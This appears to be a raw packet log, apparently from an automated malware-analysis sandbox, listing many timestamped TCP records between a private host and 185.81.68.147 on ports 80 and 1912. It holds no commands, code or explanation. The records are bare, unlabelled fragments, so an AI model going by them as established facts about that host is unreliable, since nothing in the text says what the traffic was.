                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.509759903 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.510034084 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.510087967 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.512100935 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.512259960 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.512325048 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.514273882 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.514441013 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.514817953 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.516465902 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.516479015 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.516542912 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.518677950 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.518691063 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.518740892 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.520944118 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.520978928 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.521049023 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.522979975 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.523154020 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.523806095 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.525027990 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.525063038 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.526814938 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.527038097 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.527228117 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.529052019 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.529129028 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.529212952 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.529261112 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.531172991 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.531208038 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.532792091 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.533231974 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.533266068 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535216093 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535279036 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535362959 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535406113 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535780907 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535877943 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.535922050 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.539475918 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.539748907 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.539855957 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.541169882 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.541337013 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.543284893 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.543302059 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.543490887 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.545205116 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.545324087 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.545380116 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.547302008 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.547468901 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.547759056 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.549201012 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.549379110 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.550498962 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.551476955 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.551491022 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.551543951 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.553342104 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.553354979 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.553411007 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.553811073 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.553940058 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.555819035 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.555847883 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.555960894 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.557832956 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.557878971 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.557899952 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.557934999 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.559899092 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.559981108 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.560055971 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.561980963 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.562096119 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.563906908 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.563976049 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.564034939 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.564085007 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.565907955 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.566034079 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.566128969 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.567965031 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.568088055 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.568167925 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.569925070 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.570036888 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.570800066 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.571945906 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.572071075 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.572124958 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.573959112 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.574017048 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.574069977 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.575968027 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.576087952 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.576149940 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.577976942 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.578052044 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.578109980 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.580039978 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.580099106 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.580169916 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.582068920 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.582123995 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.582154036 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.582221985 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.584028006 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.584139109 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.584203959 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.586031914 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.586098909 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.588114977 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.633490086 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.707905054 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.753273010 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.013371944 CET4975980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.067682981 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.121471882 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.133550882 CET8049759185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.133630991 CET4975980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.133683920 CET4975980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.253602028 CET8049759185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.253685951 CET4975980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.373488903 CET8049759185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.893539906 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.013351917 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.328272104 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.371474981 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.458897114 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.578762054 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.748032093 CET8049759185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.748136997 CET8049759185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.748380899 CET4975980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.758052111 CET4975980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.872457981 CET4976580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.877861023 CET8049759185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.892817974 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.898848057 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.992203951 CET8049765185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.992324114 CET4976580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.992423058 CET4976580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.018850088 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.112174988 CET8049765185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.112297058 CET4976580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.232193947 CET8049765185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.332830906 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.344742060 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.464575052 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.778774023 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.783126116 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.902932882 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.216841936 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.262092113 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.305701971 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.426631927 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.594755888 CET8049765185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.594839096 CET8049765185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.594928980 CET4976580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.596777916 CET4976580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.700098991 CET4977180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.716531038 CET8049765185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.740521908 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.773149014 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.820101023 CET8049771185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.822448015 CET4977180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.822622061 CET4977180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.893178940 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.942748070 CET8049771185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.942825079 CET4977180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.062706947 CET8049771185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.211205959 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.211225986 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.211302042 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.213664055 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.213792086 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.213993073 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.222058058 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.222090006 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.223872900 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.425875902 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.545974970 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.545996904 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546042919 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546077013 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546088934 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546098948 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546138048 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546253920 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546262980 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546303988 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546386003 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546396017 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546431065 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546441078 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546453953 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546474934 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546511889 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546566963 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546587944 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546603918 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546652079 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546652079 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546684980 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546694994 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546726942 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546931028 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546940088 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546950102 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546960115 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.546974897 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547003984 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547050953 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547101974 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547127008 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547162056 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547247887 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547287941 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547302961 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547321081 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547358990 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547389030 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547418118 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547458887 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547489882 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547538996 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547547102 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547588110 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547693014 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547703028 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.547739029 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666147947 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666181087 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666208982 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666241884 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666250944 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666286945 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666300058 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666343927 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666424990 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666429996 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666505098 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666527987 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666555882 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666661978 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666688919 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666716099 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666770935 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666798115 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666830063 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666898012 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.666929960 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667037964 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667125940 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667197943 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667257071 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667309046 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667357922 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667432070 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667448044 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667493105 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667520046 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667551994 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667598009 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667639971 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667687893 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667732000 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667819977 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667865038 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667866945 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667936087 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.667982101 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668037891 CET191249729185.81.68.147192.168.2.10
